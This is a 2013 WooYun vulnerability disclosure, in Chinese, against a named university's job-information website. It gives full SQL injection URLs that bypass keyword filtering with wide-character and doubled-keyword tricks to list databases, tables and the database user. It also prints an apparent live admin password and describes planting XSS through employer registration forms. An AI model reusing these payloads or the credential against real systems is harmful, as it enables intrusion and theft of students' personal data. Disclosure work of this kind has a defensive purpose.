当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-044286

漏洞标题:某校就业信息系统SQL注入后台弱口令可导致大量学生信息泄露

相关厂商:郑州轻工业学院

漏洞作者: RedFree

提交时间:2013-11-28 14:43

修复时间:2014-01-12 14:43

公开时间:2014-01-12 14:43

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-01-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某高校就业系统SQL注入过滤可被绕过,导致数据库中信息泄露;可使用管理后台批量导出学生信息。

详细说明:

问题出在档案去向查询页,访问:
http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059&search_type=1&actiontype=0
可查询学号为1109059的学生的档案去向。

1.jpg


输入学号处对(',select,union,and,or,from)……关键词进行了转义和过滤,但是可以使用宽字符吃掉转义,使用s select elect、u union nion 来绕过关键字过滤。
1、使用order by xx来猜字段总数:

2.jpg


3.jpg


字段总数为118。
2、查询所有库:

http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059%C7' u union nion s select elect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,SCHEMA_NAME,16,17,18 f from rom information_schema.SCHEMATA %23&search_type=1&actiontype=0


得所有库:

4.jpg


information_schema
job_zzuli
3、查询job_zzuli中所有表:

http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059%D5' u union nion s select elect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name,table_schema,17,18 f from rom information_schema.tables %23&search_type=1&actiontype=0


得:
admin_item
admin_itemfixplug
admin_itemplug
admin_logs
admin_menu
admin_navigation
admin_setting
admin_stat
admin_usermenu
admin_voting_input_results2
admin_voting_option
admin_voting_option2
admin_voting_page
admin_voting_title
admin_voting_title2
bulletin_files
bulletin_images
bulletin_zhaopin
bulletin_zhaopinhui
code_byqxdm
code_dwjbdm
code_dwjjlxdm
code_dwxzdm
code_gzgllbdm
code_hyzkdm
code_jclbdm
code_jhxzdm
code_jsjspdm
code_jylsfsdm
code_mz
code_pyfsdm
code_tdfsdm
code_tdxzdm
code_wyjbdm
code_wyyz
……
……
4、查询用户

http://job.zzuli.edu.cn/index_archives.php?search_keyword=1109059%C7' u union nion s select elect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,1,2,3,4,5,6,7,8,9,10,11,12,13,14,user(),16,17,18 %23&search_type=1&actiontype=0


job_zzuli@localhost
5、查询数据库路径:
/var/lib/mysql/
……
后台弱口令: admin 63556326
冒充用人单位,填写信息的时候加入XSS代码一样打到后台(管理员定期审核用人单位)。

7.jpg


大量学生信息:

5.jpg


6.jpg


……

漏洞证明:

4.jpg


5.jpg


6.jpg

修复方案:

1、过滤手段太简单,能不被绕吗……
2、改一下后台口令吧。

版权声明:转载请注明来源 RedFree@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝